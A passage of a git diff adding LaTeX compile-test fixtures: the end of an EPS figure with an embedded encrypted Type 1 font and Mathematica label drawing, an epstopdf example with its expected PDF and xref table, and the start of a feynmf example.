+B2D4F3B9FCD233B8497B35299DF28F651B0B2960B4545BF2C05952229EB1CF676DA761995413051E +885A529957538A8B2C6BBDCEDB2A3F4104004B880624C2F55B544EEE8DD29231386492598C2BE995 +6E7BA78FA75FAEBED43807FAF072839BAA02333D38BF4A59B1F3ACEA5C7BC188C0BE8A8BCF2069BB +E36BDB2203EAC19D249C4ACFBF8F9717111B7F4637D631D058EAE0CD4E4E8A9F0ACE1BE19B3A241C +9C6DCE2513690473D8F4A59E1A7FCC926885CC324086981FE0C6AADB8F48116822C59B1E93F53829 +77CC88B82FEEDD2B4CC6095691FFA1419D5A6850D3576C4E705C676850D0BCAB84D52791355DCC7D +70A7F5CF603B4D0D7F0CF4F25AEF44F21A2D627D45D306DE0BE1C794AB90DD1EECAB2D61A115D3D4 +AFAD1914E808B16BC868FD48208E1F915B0E8ECFD59AA5895CD7ACF95E0DCE87DD8B12F683C8EFD9 +625CD388337C262013626A06ED60556FA70A8D425D36B48E430758AB4CAD34A656F457A60E4DF933 +07C4D5B2698501E6D1F270CFF70E47DE38A5FCA2B04D7BEC3A2945EB93C49F1D366835581B42F43C +C99D71F13F45A9FF8D12E26C43E1B994BE5AB44E5309B0F936D78C93169D666DDE6D18E33A5E016F +32278897FD7E76BAFE39498C6A849F4A6D882D109C40B42488059554CC95530FBBAB2591DCFADED7 +3EE5F2F2BBF17F4A131B8126F9E0AEB4B379CEE4EAD92A1BB29E3789EC19671E77558B4DE961629F +28B49DB4D8FAAF541D23205844EAA801FEA468D26F32BF9CAC30BCA244246A55F600BFBB61C5E8C4 +10CA07319DD094770DFFC1CB700DF67097F61C46036353C8AB3A5E5198445A194BF189E20490E970 +7D2C03C1A003BC782A66841AE5DDEED2297BB6DD019C98A66A8F279748DA39C85CE2082D09210EAF +CA995591A1A3DCA52EFC9A752DAE0CFB125127DA2932AAAAD7E9850AD78D48304260B4C270EFF12B +160DEF2C2B8E30E8C137975AD20046F37A72F1355F31D878334D96313D330C24EE7350D4042AAE2F +A345EDCEB133121D4B39645B1D6114D0597C3301B4CA56DA2B4A457D7A51BD13B7AC61FE6E1CD451 +6253F606FD4B57E9F4895CAC93691EEBC2AC992CC5D122DD3FC6A9EC8FD337CD402F03F901CE7986 +2F4F4E4500617DA0F913E357BED3ED04F49FD61FD1C66606CB231C3B7A5042C7C07EAB2E02BE8CF6 +AEE5E16B4AB725B5FB5D01EAD4887E365BC2ACA579BD80E0AA686E4A08DFFC70F99132353E3D5898 +5205807271753BA3DB7264C4567DF5FE999514F28E1DD6D3E966D8810978B140F8DD9BB259078A47 +013BCF247C37F543C0899B532F34843CA56F18F688B42A12DDE2A90CA457860540B6FA138F753DAB +E7331188ED6F535480FBFE934F68EFB1C9C16D4F11EDB35F944EAE63751101928EDD0E7AFE64D7C8 +5E9CAFCBA88450DEF9122A245FC1ECCF9EF8DD94EE6A70CF16ECAB39B52597AB1E8C47B6DA4FF0DE +C7D0FABC84DDCC8C652DD7C941DB3FDCC5F0542A8F433AF9FDF4D393E123884E1DD5D359D46DAC61 +0694020BAE84B3BD4C068E3BC871BE21DA13571BB61387E207926769236776B5B31A4A462902966C +DC3D92BE171F10EF8395D2402F0C492A3FE55979CB903CFF2CD2319CE4B46481489E798A131635CB +2E70147193FE3C8F4570FD01BE10E004B17341C4DB8B029BCBBC45D31227A684E5F38F5D6F0821C3 +ED13D31DBCFF51BD759C84A98145FC86D82F871D2D83F43C3DD7FE9A064120338A7BC63A2C60667E +25B50EA1C267174B334F4437856295A6B826F54C3EA9ED39CA6909A0F6D9669F1E75A7A05CFBE7B4 +2C330668E311872177F0BE3A9B3EAE611EB48721AAC2F10C3CCD897CEA8A136E5E10C2337BC5EEB2 +FBC1A3646A6B6792CA3946BA5D4D135D929547042A2F0D0A202A4D86E3F7098C823E7AE4331CEC6B +607F6AA434180B4153F6B10DCC914A92D6D0934551BC9DDB3C78065B2177B264216AF5524D798AE6 +2A90D00A70CB36C5B9950499163C2C1B04339FA76D28E03A4D0C80FCF7BF29B8A188C67EAB6A4BE7 +8C07713C7EE09043301B5BFD60222DD0D0943180AFB286D2953A8A12661986A4812E2C0DE5B3E703 +DAB34AF0E9306A5711D286AD09A3C6AB80841491BD0E5A1D1ABE1D600CB494BC17EC4F74B45870F6 +AC41EFE16BB6C87F382DFA4B2B8DDC9C2E912FD139A2FFD5C92D836F3D749EEB985C62A376849751 +A6AC56B1F679A85FDAD9448DC7A4CFE323AFB540408547C53297DB6FE9A0B08901BC285997934A2A +1772090FBA175CF4660764B87A21A738519D5B619840D15F45DF3589E8B80A6DDF1F395B65345869 +58C7060DC131700DFF6E25962494583085E6F8BAEA557A5666E6634E4704D0C07BB0A2EB228A7BEF +EB890B4EEC638303B8005BCCE922CF3A7AE627206F2946A142B0095FF960BB8B8F9C975B6FF07479 +2D5C3DFA125B7BE7A8356D8B44E264AF6AA582DB84BA09D2FFDC2213903FE8FE16DE5EF61E518DE0 +6A29D98E217038A4CA4D219E4F114858CA493AEF0CD6495A7C5EF1ADA06AB543051B1A5213952D46 +648BE06D15B1728768BB853CE32943AB0988D172227780CE82D1A1D297D0D6ECC51B290E156645B6 +9BD54699940AB17EBE10EDF258BBA6BFEA39F4F0B066FF6B3FA16C7C72F2565CC028F249BAA4B488 +B48A2513DCC5D1E205FB874BCFE45612DF4EDAF815CDD53CBB80842B429B1AFA32D35EA58E17F4E7 +252C2C9A737AAECFC25FD8CA5520D3EA38AF71C61B88F31FB53A7F5369305D63495ADABA455C3C4C +35D9FE423A00CFBB278CD482D3FD33BEEAC1F359AD9B6AA17D60CC46FAB670ABFB3B2B4161B9EB9D +949A06CC3B734F63DE821FE0B8EA065B6F79C0601E46E8CEB6E2DE0C052771E0EC7012063F1AC46C +3FC454767469225AA266784DD77256C6FDE25D7D857FCEF2562AEBE38A9A47063AEF91449723E680 +B36D824BB95BE95C9802F7AD4DF1AF37B4777A1E116A7EEF770F0A499BC9F9675A775503091D4EBD +F55118782E3E54AEBC67A0545E8D75BA5A482C6CEC50595D45AF041664689AA4338C1428870CDC15 +BFEEF788C1D1E87B3389103225E2619120B129FDF048DF3F5DDAFF1CE87428E6BFA591B91D82720C +E4A72FBB952403435248657ECD5456CA814FA0ECBE70BC3D391AEA0A195AE8FBE92D054AD0F3E549 +841ACDCE59DCAA9DAC20348A1D05DF7B4127C75F4C6607EF8501F741CBC96AD8D429A4CA8034CA52 +9AB673EE706F1FF51DD93F45802031EEBF8F3AD29D2A74888B1CB344F88ACEB9B4DEA13ECAE0A3B7 +1FF5CAA38D0DC484B96E90251D56732B85DB8A8DBF10E0A5921121CFDFDB6EA9CA45B98584401C3F +346BD026DA2A17E75CEEB74E48667F9BF5C538623E88021F0C24EC7D082C3E1FFDE5A6F68F0F3F6D +2B61547C4C14614118F7942851B090D6C8D80BA06D9139CB5AEB0EF77DEF2376C0BF602FB1083178 +27E86DDCC00622438FD7A268C0252CA2E20DA887A9D5ED251FD5CCE811E514D702206E413DEE7528 +3A6AEF793F5E3E3B0B10E59226102DF2A7347A95B96E39C6B6ABD1FB4B7CDC0813D7390E2819EE50 +7E5458E06D43CC3BF16E40CEC4E64909615CBFCD233B5D316BC8B8B46243CDB7F2FBECA2F208D0A7 +985048E88A5E685A9EE8C3A351FFCFB522C1EE41A8E4EF0A080C0D110D2A0D8A980AF1F604D1CD52 +3CF41D08A45EB809AF11F530C138F256FFD49BC20F77005D004AC85FD563E8E8BA5F79CC60FDE714 +1416F4C14FFF281ECE2BE1D167B7B1ECE17790454F795B056CE4DF1D08F25F0E5E2A16CFA066AF97 +F3A80015068FA2A1D65F329A5CF7856114A77EE7295C7929CA27796D8C51B31347CBC7C4EEF1E75D +12237C558BE5B65DCAA4CDDCB419E543B1785DF8B225C2E9778839123E6F85E53D925C6D2FC0327A +EF9CA13D1F2F9B3E510A1A4190D3057227621788AFB6567132238BE86559BCA006B85AFBB8AFE5D7 +A8CE58AF731F2550108C6B8CD63632184B1E218F01881CB94CEBFFC310F263565A39C83C874AE474 +AA213F7DD9CB3B8446A3E47E81BACF7B16E4A80899BF2D30C28F9DE0678DF364589DA6A454398E30 +21A92AD1D8B0DC494D96A06C7568E34547F0E68829E5D15F6500ECD7403B40B5CC2A479D0F8CE3E8 +709861608AED046339BE055BAED1A6BD2311CF918E74378D893710D42A769671326E947F108A38C2 +3F92EF5C6A50EFE36E858671F17151C719B9C7D60E8E429F088616D616080DC676760BE83A3F5229 +6C4B13CA3818E3FEB56D51DB5979F28063F7D537C15493D57CAA1E55438C01C794336D9F21520484 +FE5B5BAEAD7121E3CCC5086E2F2191DBEE9527CA61CE85CC0A4D99EA29169B17A10B3D4372EA493D +48CF572E570CF48B3B7512268A9AC4CC161F97695D19412C36F1D67522E272B1C18B6122A355B43C +37636E71462503C43C1AEF5ACE34A6442075B59892BA54E9B5A99B9733BAF64161450F8ECF4FB2B2 +DA6F9AAEBC827CD9AEF94BB463935C26E1DD5DDCA5BA87E0EFB62D9D3226DC28427EC097B68C9EE1 +E47D125F884F8656C8AD55D625A8F7F1A306383A5036A12E63B6FAC4A215AC88725611EBA74B6770 +B20F45356879DB807E9C9105D14C83104B2DCB4F274A2F37152425935B3F2D1633E4444540F7411B +24C17055850C9528D912F9DD40984CA1B3BE277F82198BC99B80233B8AAB674A44B42B9123E886B7 +B3161D48B4AA24970BB75A983569690BFD4B92E6ECB410DDCA14A3BF59057397FF1AF159BE230216 +FF2F7009C3A3DDD81F2BD1F5C10C2C2F30A8095D7371427AC9D527AC6794CF8593303F786F21CCBE +36DFBE01B0ADD78DB3C9483D9DB09A9E2577A3A4296E7BD09C41F5C91B29C9D7E69EF06B5BDB66E0 +853C3DB133769BC8858121A350CADC1D61C77C1A313833D077938AB2E10EF970590256479B1549B0 +401A9C5E97F12A269A305B372F0EFC035B06AE3E2187D6E3A62DE3B4E8075F0ECF5BE32A5B97A4AC +23A7335C4AB29917129C08250DBD1D5BC123C92E821BBB1A7598E32DDDF1876C6FBB7B858FD317D7 +6022955595338AAD2BFB3B17DA11380E7473A5F566C6329E0F38D9A67E68FD4B8CFCC82FC0BD7BA3 +9A25D5BD0952CC71CF0BD7B5EE184A8E62FBB366D95AB051BC3A80E9F6C27EC100E00C4A002291B0 +4D758A9683657FCB07A2AA8B07DF585CD4205B4DC55330E8A2A367CBE966E84618ACFCAAF81C8A9D +3A3165FE5A623720A0C11CBDD5CA200100DD2C970A09B124D98987D6A2CA7CBB40DA5B585B86FCB3 +8E96F54C64A921D7A5D2F805C67339DC4FC026FB2EE533BB9700F66F4AD58949B3DB75D770C4D7C5 +C23DC720D78124A7ABF30CDFF10C708219903431C7B1A19317341CEA22AA11A588F8AF9BFA4AAC40 +31EF22F13BA597BD1E5958CEA741274197113CB0B7975424C17F73733ED30BDC0170CD0084BB7DC1 +8F031BEF2A6C44D0EA0EBB84E31D5B4C50B63DF0AF96AAF33E3C986D4B82D161E2F9049DE9710EF8 +A11BA0E08266A3547F20567E582EDB47633772D37FCCD119AF5B11F338098F185D5B055975F56092 +CC6979FF49487D69E08A4E8754FD51D29410F56E0F3EFB9C3B86253B3B0A39E9D217604F664CC696 +634D216524F976D066034DDE8EDF5E8F9644337C50C7D8E2230B38E0EE88C53DEEDB3363477E32CB +88B3ACB6931B9717FC93F8D1A9DDDA3A7D8A56783F2B651A1DE216493C34DCD17A7635D21CEC0770 +751424B599B00CE950E60D8A8B3444F1629220DF073137E2ADE1B6243C1C69BD5E10450B948BFCBA +46A841B98BCE7C86E120789C73C87E581868021E68F78CB903AA6D494331174CBF944221DEA9E567 +A2542BD399C5E471D972FAB7E8950AEFF3D91A1296E685B0BFF91367C2703DCAB10AB236DE603E3E +993C4C9020EEBFE89726AB9FB92AF9D371D7188448CAB9FD2704506C39F0842E36EB8B9AAFB1F26F +CD366E66725AD28B19FA57537757EC71B04B451F056C3AEBFA04D1C0CABC9492B6B8D239EEC36776 +D6B515ED43A66AB4342BE4C8B2027F2D008EA231A24B472DA8352A05DDEE31CBC3577E5814DD2D4E +C17A216A7C8FFB27012346C9ED12F7819B96A5B135B6196E888C9AC73D7D4B7DC370E2FBFA17FD74 +0BF516CFF69294493900BFD63721A537BEFB31C5262567103F9CEA4E8DB02964B983E1AF190ECCEF +41F552C45E9B94E29AE3F129687EC35719F591C1987A08DCED3B822344DF81A70AE78E14A81EF1A1 +A77FD5D19F7D35B7C12A473EE11C655E15DC5D3C94F226CBDA85377338BFCEA18359176CA7EED622 +84F9015F2D592E27F1037C95570CFDCA3B9B90D35DB8C341434BBF04C0E692D4C2C3F59EF386CD1C +5A8C783198EBE42C89E3B64C662F7875325982E9299C18DBD1FD2257DD964F9F9DDEEBFE56E4AE9E +8163E8C58581BFD5818BF396CCDE3A66F58E17BDD262D63E5D9AE0D0E43C304CCAC4776B87D40F6B +5AD7E625B2065FAABA81AAF2E2D32E0ACAB12DB2A9FE9C6160FBA7DE5AF019810AD9C64B2E6567B0 +F0108E8EDEC635F4BA88BDEBD3561CDBBB9063B4D19C493E0CA4F551255A7DF6BCE96C17A5DD4877 +7F654F4F114CF29ECDB9779F63EECDC04E1FA06E48701547A8F96483B4195C0DE90B0FD1B95B5F12 +5C43BB973D0B6414A994595359289B5FFEE4A08D684C2E7E3F417585581318D54DF2EEAE7CF36E2C +A1A70EA76154B88C1E4FFDF5EBC28ABE264B40583F2DE1F761DC25DF242396AE502CC63EFD6EE284 +DB37B0DF36A8833ED3EA5A1DB372C8E1F3203E6E945A53D83B87250CD72C851F68A602E7BCF92DDC +E600D518069F8900F3BCA434D21694229572D55F307E0FAFA3DAEA864BAA19F227097963CE83882D +22FB7F1AA3FE558A3669BB7FA37C0A591B4BF3E2A2FF85BFEDE5E424E0AE337EABDFD67BBF38E160 +09A687D2E7C1882DB79304D722EACA233EFA489B10E8D4D404D12A5A4683FDE377A9A952CCAB257E +ABB408D75FF130206DC3447F26E74D1D00354313E340878917177DBD2AA5A2A70E2087D551DA5181 +6FAD07F6E826DB0BF21560BB26906D3100E12AA3801D4A8BDCBF1A0A8D58F1054EE2A0DB04ADDF3F +EAF1FD6E322BBEE274A4995EFFEAAD0F24D9FB45730F6BA0F42D88BE4AEBE9777F8AF508DED61024 +EF955B26ACEC51AF5C21BAD7AD93CC0C9DBE03C0FE9637A3099E5EF329051C87FFF70042D788F21F +4DE645FEBF58374F7E38A9AFE3DE4D2888DD807A09169DA8516DFE37591C122A4798343C1A8121C7 +430F244EE5B19A21897A4423E21CE0492E75C9320E37BD65F1EACA7FC6FE032842E4D985E666E633 +AE5CC62B3449404672B284EA5C6A01E927787104ECCE1354D1C0E5AA2452B7B12937B946B74EFA98 +8C5C79EEE5ACDCFC994CAA853AFA08EB9E180C5E898FDDF8903EB0863E98A4FA537207C154CE5B98 +EF4E97FB6A1CBB07C45D34221EED26998EC864475D231FF76E830A7C0900C4B5FCB980E3F67F4EAE +3DD8086CFA1874E65C424646C7A8F84272DAB04A5984FCE3F4B89380B3A5C6F04EA3B683CC224913 +9209136336AC9349AA89690B5DE0D93E92F996BA7E346B043EBD45A35FA297DB70E9A6250B138674 +FDDFA609BE11EBA8106EEE3923B4E2657CF7A82443C25022A5DED862E8E3A5BFA7B8AC1C1B804B23 +C08A7D8FE594140E8432C1A5E183FE361B6B8C763054458798B756A6CD2535FF4667C634DF78AFBC +C87D40DCD56FFFA12CFC6EDC6A8AF41AF657E0137320624F1895D9AA84AABAC5F3653E977B054C52 +92B06FEAAAC0E5C7FD45B6654D0D9CCDF292A8489E1E6CD929F0AF25B9604CE33BD25662133CEE99 +CDBBD00F865431193767480700CA019D694B38D695CC29F732B5B39B6CE654F1AA18AC3223B60E55 +3FC3C3E114E6A2E59617BFD58AD8E429200B59E035DB7D67C8DC6C72001D005924670ECF7A06FF5F +7B3DD5556DDDE1BE5163F7CD6FC969033EBBAD85856522ECA91F2A200A75BDDA69070240D86C2D7D +959F1DBE45D488A96F308269E8262327A410D057446F596418DF4A12267A7A3FF5ADEA0846896D3A +EFE3D5C72387F7EEEE809BCCD23D1126B86C45A0F66404FAF617D03379A2E44865051E92B4C835F7 +21492147DE3DCCE47EAD192D3F10A5DD459634D6C253F4D09DD98E7DDC836EED8DE08A78A6F6FB93 +84565CF6DA8D4C948144272D5F8787643B9B550F96E42A8CFC0F1C1F2B14D83201199E9E1F5BC0E6 +51E39E16A744930F4409C61CDF9F456C7EAC5C62BD22CE0DDCCDF3755DC670FDC8FEBF09F241BF95 +1A1694BD70B9695A15653F719DF4374AFC6C27F58DD144253BDF86FC1BB3D4FEAEEB9196BCEC7168 +AF1488AB7072751FA24C6642B87DCADF4B2427631E7D7FA39D126410189CD8E24CF0A490FDC7045A +A9A83D02CAB57B9C27211FE1805080FBCEF23B86CDB19885A574C589BDB15C4CB3651FA3D2D6B619 +4449B16D927047E376A84F9423562CD548D192AD0A57E0D5B41010D1C7D87929DB6F456B0A073DF9 +A8220BEB3D4DA01518B5C85C82ABCC821BEEC1965283DABF6AF3AC55ABDDAEF1B53E6119DBB4A114 +44FB1769F9891B5DC931ADFEC8ECEFFA179427FCB08C1B149EDA70717C5E9322F3CE9405438481F3 +90968A38061EDAA2223147D6143877E4C4E645EC0A9803A933116D610491FDC639DF69B418156772 +E14A428864982D3230EFFAA1D2D3388B0F70D8FE202CDD6CB0E97B3290ECCF4A1A69D93C11D3D735 +FF0B5A9A161A86CA4F16B7C231B8BF71D5083697B2F24C0BDAA6E83E5DD2222DA248D4ED3B5509CC +7CA40D8D5A2507A1D40FC1AE9486343CA2B2C65B6CED9B1F4C0535ADF7BECCE45E1DB74C7417B06D +897C6ECDD05F068857D931B3D960103628675BE2FB82DA774ED3786670D8C2BA4ECC36C203C7F7E0 +9C97A09E3B2E2C3EC30B53A8825519B664D09F149AB73F183A4A22C8F20E2052F76649AB881BA28C +6C3C3950EA9B3961F87F6AEFF24DD7B4E10DE28C15DCB27F593F98CBC9CDE19360C5531B2A0C6DC1 +8FAE2832AF49BF9522C068F3036516F711AADEE496EE4E3EFA2F55EA4891DEC6D8A868E0B0017076 +3040CA4D42A73A71057DFE315FF8625BBD74F41E5CA77B7DF096C2F4F0D51B1184CA9F2C8517FCB3 +956C44873D630E94EAA1D2D1451B332770172B2D7A21ECAC864C612235C0B39ADF55EF074F2073FA +D3B54A66B07AEA1FB495A9F7269BD1C07692B0B762DA6881EE6B265ACED0BF0794C0397F8D8B13FF +275BE77561067E2C1FA536131184682BFD32384C6488012D29E8E55838E5A5AA7C40C20AB6B03BFD +BF4EFD2001A612100D585BAC1C77C1CB1ADAF2B000E09686091AB7D1AB6ADE395A03580BD78E961D +14D052E7D4A61227534B55FACAFC4E8F9326DE35BA53A463F7D94B705698300771185DB19E78FABC +D0AE4FCE005B79C795B692F2D9C00B6A61D4B343C35E417BBA169EE82A2E4AE204A126B08A94191C +6E5B5E8328A147BD6ED5A5AD5C9143A50C47789DCFA699720336AFFBD6B1646D8C35139B0DC34340 +C76C7E4FD72DABF80BF64BA04742D07B380E20A678EBCB19057F2346FEC653F1302992279DCCD2E8 +902B2B8F78435AF3400DAE319E94E3148BA88C056701D524DD67FF368C85EC6366F31689A62FFC03 +4BE436588ECBB8B41E8C43112F3B65F50D20A5EC51A26FE899E74731B01C7771F75B76070DC0B223 +1845BE9C09670E65C4DF54C0FB36511B735251AEEBD13FDC0FCFC3134D8DA826E4100521CFEAB202 +B83267EB3F69AEEA25FDE1E9C86407E38AB4CA2D1B91607EFC96DDC5BB10FCD46DEAA5FFED196959 +12302ED55DFACFDC6F22C1528AE3A9902B75F46A489352C87B0F5056FD149DDE67219A3C3D1DD875 +BAD81AD443E0F90DC79D979E10B4262DD20B255B04BBBE5C988B23667135CC61D988928F5F07753A +C76807203942F6B62A178A1E5CBBFBBAEBE735D09B747BF00C360F2E2B6C9F2261F7DB018EDF40B1 +3DB4B7962D4D2F858E1FA6376F21ED9CEA4BEE07FFE27F136BF60352AFB71CDBFF7E65F6B4624E16 +C6E5AB7FF60B4711A178FEE691DD8D362B14175A69070FBC5B9EB15248E4DFDA3C9453335D0E1EB2 +7714E4624C7215A73B53402B02CF7AA05A14CE1E5AE161B75F218BF0EE1215D3CD925D5ACB7DBD2E +BD8E4405433F432C491999794C814D5B384B7A1C0AB28A11CBD0A6EA12678508CF86232309B0BBF7 +EEA929FB7951F5A6B367C5AC57DD7D3B3C1E2188DD4664D14FBC32B1A1EB53D7EE7F55F4D5C2D014 +528EBB7F0E595F7618721451EE6B83EB240A6C4D33377893D4EF542F47EB2845A09759D5554C74DC +5E9109FFC8C929CF1AC446D8149957720EE4FB670D3CA61378549DB992126B23618CF49361D6D4B1 +C73C3D37E4A4465ABB349CFA34E9351D1192E366267EDF02DE432ABC80792B0CFD41FFD0AAA42E63 +3F5B2177A351D33477C636CA573CB02C07F7F7A41C9F1BC4C112BD6459DD130757D2BD6F47495C3F +92E99522871DAC2865 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +cleartomark{restore}if + +%%EndFont +%%EndResource +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(2) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -118.485 -136.705 ] concat +1 w +[ ] 0 setdash +P +P +p +np 181 96 m +181 112 L +219 112 L +219 96 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 181.505 96.904 ] concat +1 w +[ ] 0 setdash +p +np -1.505 -1.904 m +-1.505 16.096 L +38.495 16.096 L +38.495 -1.904 L +cp +clip np +p +np 0.495 0.0956 m +0.495 13.096 L +37.495 13.096 L +37.495 0.0956 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.505 -0.904 m +-1.505 15.096 L +38.495 15.096 L +38.495 -0.904 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(5) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -181.505 -96.904 ] concat +1 w +[ ] 0 setdash +P +P +p +np 267 3 m +267 19 L +305 19 L +305 3 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 267.864 4.035 ] concat +1 w +[ ] 0 setdash +p +np -1.864 -2.035 m +-1.864 15.965 L +38.136 15.965 L +38.136 -2.035 L +cp +clip np +p +np 0.136 -0.0353 m +0.136 12.965 L +36.136 12.965 L +36.136 -0.0353 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.864 -1.035 m +-1.864 14.965 L +38.136 14.965 L +38.136 -1.035 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(7) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -267.864 -4.035 ] concat +1 w +[ ] 0 setdash +P +P +p +np 295 86 m +295 102 L +328 102 L +328 86 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 295.617 86.954 ] concat +1 w +[ ] 0 setdash +p +np -1.617 -1.954 m +-1.617 16.046 L +33.383 16.046 L +33.383 -1.954 L +cp +clip np +p +np 0.383 0.0458 m +0.383 13.046 L +32.383 13.046 L +32.383 0.0458 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.617 -0.954 m +-1.617 15.046 L +33.383 15.046 L +33.383 -0.954 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(1) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -295.617 -86.954 ] concat +1 w +[ ] 0 setdash +P +P +P +P +P +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +%Trailer +%EOF diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/main.tex b/services/clsi/test/acceptance/fixtures/examples/epstopdf/main.tex new file mode 100644 index 0000000..c35a378 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/epstopdf/main.tex @@ -0,0 +1,10 @@ +\documentclass{article} + +\usepackage{graphicx} +\usepackage{epstopdf} + +\begin{document} + +\includegraphics[width=\textwidth]{image} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdf b/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdf new file mode 100644 index 0000000..74641a9 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdfxref new file mode 100644 index 0000000..f6f11e1 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdfxref @@ -0,0 +1,30 @@ +1/0: uncompressed; offset = 31354 +2/0: uncompressed; offset = 31614 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 727 +6/0: uncompressed; offset = 777 +7/0: uncompressed; offset = 909 +8/0: uncompressed; offset = 1017 +9/0: uncompressed; offset = 19127 +10/0: uncompressed; offset = 19313 +11/0: uncompressed; offset = 19557 +12/0: uncompressed; offset = 19948 +13/0: uncompressed; offset = 20677 +14/0: uncompressed; offset = 23321 +15/0: uncompressed; offset = 30318 +16/0: compressed; stream = 15, index = 0 +17/0: compressed; stream = 15, index = 1 +18/0: compressed; stream = 15, index = 2 +19/0: compressed; stream = 15, index = 3 +20/0: compressed; stream = 15, index = 4 +21/0: compressed; stream = 15, index = 5 +22/0: compressed; stream = 15, index = 6 +23/0: compressed; stream = 15, index = 7 +24/0: compressed; stream = 15, index = 8 +25/0: compressed; stream = 15, index = 9 +26/0: compressed; stream = 15, index = 10 +27/0: compressed; stream = 15, index = 11 +28/0: compressed; stream = 15, index = 12 +29/0: compressed; stream = 15, index = 13 +30/0: compressed; stream = 15, index = 14 diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmf/main.tex b/services/clsi/test/acceptance/fixtures/examples/feynmf/main.tex new file mode 100644 index 0000000..c36ed70 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmf/main.tex @@ -0,0 +1,28 @@ +\documentclass[a4paper]{article} +\usepackage{feynmf} + +\begin{document} + +\setlength{\unitlength}{1mm} + +\begin{fmffile}{diagram} + +\begin{center} +\begin{fmfgraph*}(41,17) +\fmfleftn{i}{2} +\fmfrightn{o}{2} +\fmflabel{$g_2$}{i1} +\fmflabel{$g_1$}{i2} +\fmflabel{$p_2$}{o1} 